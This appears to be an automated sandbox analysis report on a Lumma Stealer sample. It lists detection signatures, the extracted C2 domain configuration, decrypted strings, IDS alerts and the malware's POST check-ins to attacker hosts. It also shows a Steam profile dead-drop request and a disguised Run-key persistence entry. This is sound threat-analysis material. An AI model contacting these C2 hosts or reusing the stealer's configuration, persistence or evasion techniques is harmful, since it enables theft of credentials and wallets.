Windows Analysis Report
SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
Analysis ID: 1519702
MD5: aaf6f0c0f007e9462c8bf58acd555caf
SHA1: 0125e82a9f1ec4297c6d3bf8f541882b5531f5f6
SHA256: 927f2074ad7b76b46535cc94eb1fb357e528258dd0e55d828decb5ff5e70d2b9
Tags: exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "stogeneratmns.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "sG8pjw--MagooBR"}
Source | Rule | Description | Author
00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Music\AviraUpdater\AviraOculus.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OculusAvira

AV Detection

Source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["offensivedzvju.shop", "fragnantbui.shop", "stogeneratmns.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "drawzhotdog.shop"], "Build id": "sG8pjw--MagooBR"}
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | ReversingLabs: Detection: 18%
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: reinforcenh.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: stogeneratmns.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: fragnantbui.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: drawzhotdog.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: vozmeatillu.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: offensivedzvju.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: ghostreedmnu.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: gutterydhowi.shop
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp | String decryptor: sG8pjw--MagooBR
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking

Source: Network traffic | Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:54940 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:60290 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:61718 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:54999 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:52289 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:53409 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:53798 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:49736 -> 104.21.4.136:443
Source: Network traffic | Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:52359 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:49744 -> 172.67.208.139:443
Source: Network traffic | Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:49741 -> 172.67.162.108:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 172.67.128.144:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 172.67.128.144:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.162.108:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.162.108:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.4.136:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.4.136:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49744 -> 172.67.208.139:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 172.67.208.139:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: offensivedzvju.shop
Source: Malware configuration extractor | URLs: fragnantbui.shop
Source: Malware configuration extractor | URLs: stogeneratmns.shop
Source: Malware configuration extractor | URLs: reinforcenh.shop
Source: Malware configuration extractor | URLs: vozmeatillu.shop
Source: Malware configuration extractor | URLs: gutterydhowi.shop
Source: Malware configuration extractor | URLs: ghostreedmnu.shop
Source: Malware configuration extractor | URLs: drawzhotdog.shop
Source: Joe Sandbox View | IP Address: 104.21.4.136
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 172.67.162.108
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: ghostreedmnu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: gutterydhowi.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: ghostreedmnu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: offensivedzvju.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: vozmeatillu.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: drawzhotdog.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: fragnantbui.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: stogeneratmns.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: reinforcenh.shop
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: ballotnwu.site
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ogle.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' htt equals www.youtube.com (Youtube)
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recap8| equals www.youtube.com (Youtube)
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' htt equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic | DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic | DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic | DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic | DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic | DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic | DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic | DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: ballotnwu.site
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: ghostreedmnu.shop
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://piriform.com/go/app_cc_license_agreementPA
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.dr | String found in binary or memory: http://s2.symcb.com0
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcd.com0&
            Source: AviraOculus.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.piriform.com/ccleaner
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcd
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/cP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/hP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site:443/apiprofiles/76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akam
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
